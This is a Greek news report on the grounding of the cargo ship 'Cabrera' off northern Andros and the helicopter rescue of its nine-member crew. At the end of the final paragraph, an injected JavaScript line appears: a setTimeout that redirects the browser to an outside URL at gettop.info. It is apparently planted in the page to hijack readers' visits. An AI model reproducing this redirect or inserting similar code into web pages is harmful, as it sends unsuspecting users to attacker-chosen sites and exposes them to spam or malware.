Άνδρος: To βίντεο από την αγωνιώδη διάσωση των ναυαγών του Cabrera

0
20

 

Μέσα στο νερό και με κλίση 45 μοιρών, βρίσκεται το μεγαλύτερο μέρος του πλοίου «cabrera», που τα ξημερώματα προσάραξε υπό δύσκολες καιρικές συνθήκες βόρεια της Άνδρου, φορτωμένο με 3,4 χιλιάδες μετρικούς τόνους σιδηρονικέλιο.

Σύμφωνα με τις πρώτες πληροφορίες, το ακομοδέσιο, δηλαδή ο στεγασμένος χώρος του πλοίου στην οποία βρίσκονται η γέφυρα και οι καμπίνες του πληρώματος, βρίσκονται έξω από το νερό, ενώ στη θαλάσσια περιοχή επικρατούν πολύ κακές καιρικές συνθήκες, με ισχυρούς ανέμους έντασης 7 με 8 μποφόρ.

Στο σημείο έφθασαν το απόγευμα τρία ρυμουλκά προκειμένου να εκτιμήσουν την κατάσταση, ωστόσο οι καιρικές συνθήκες δεν επέτρεψαν οποιαδήποτε προσέγγιση στο πλοίο .

Την ανάσα κόβουν οι εικόνες της δραματικής διάσωσης των 9 ναυαγών της Άνδρου από ελικόπτερο του πολεμικού ναυτικού τύπου Sikorsky.

Πρόκειται για τρεις Πολωνούς, έναν Ουκρανό, έναν Λιθουανό και τέσσερις Φιλιππινέζους, οι οποίοι μεταφέρθηκαν στο Σισμανόγλειο Νοσοκομείο, για προληπτικούς λόγους, όταν το φορτηγό πλοίο με 3,5 χιλιάδες μετρικούς τόνους σιδήρου προσάραξε με αποτέλεσμα να πάρει κλίση 45 μοιρών.

Το “Cabrera”, με σημαία Αντίκουα, είχε αναχωρήσει από τη Λάρυμνα με προορισμό τη Φινλανδία.

Με το αυριανό φως της ημέρας και αν το επιτρέψουν οι καιρικές συνθήκες, θα υπάρξει νέα επιχείρηση, ενώ ακόμα δεν έχει διαπιστωθεί αν η κλίση που έχει πάρει το πλοίο οφείλεται σε μετατόπιση φορτίου ή σε εισροή υδάτων από κάποιο ρήγμα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here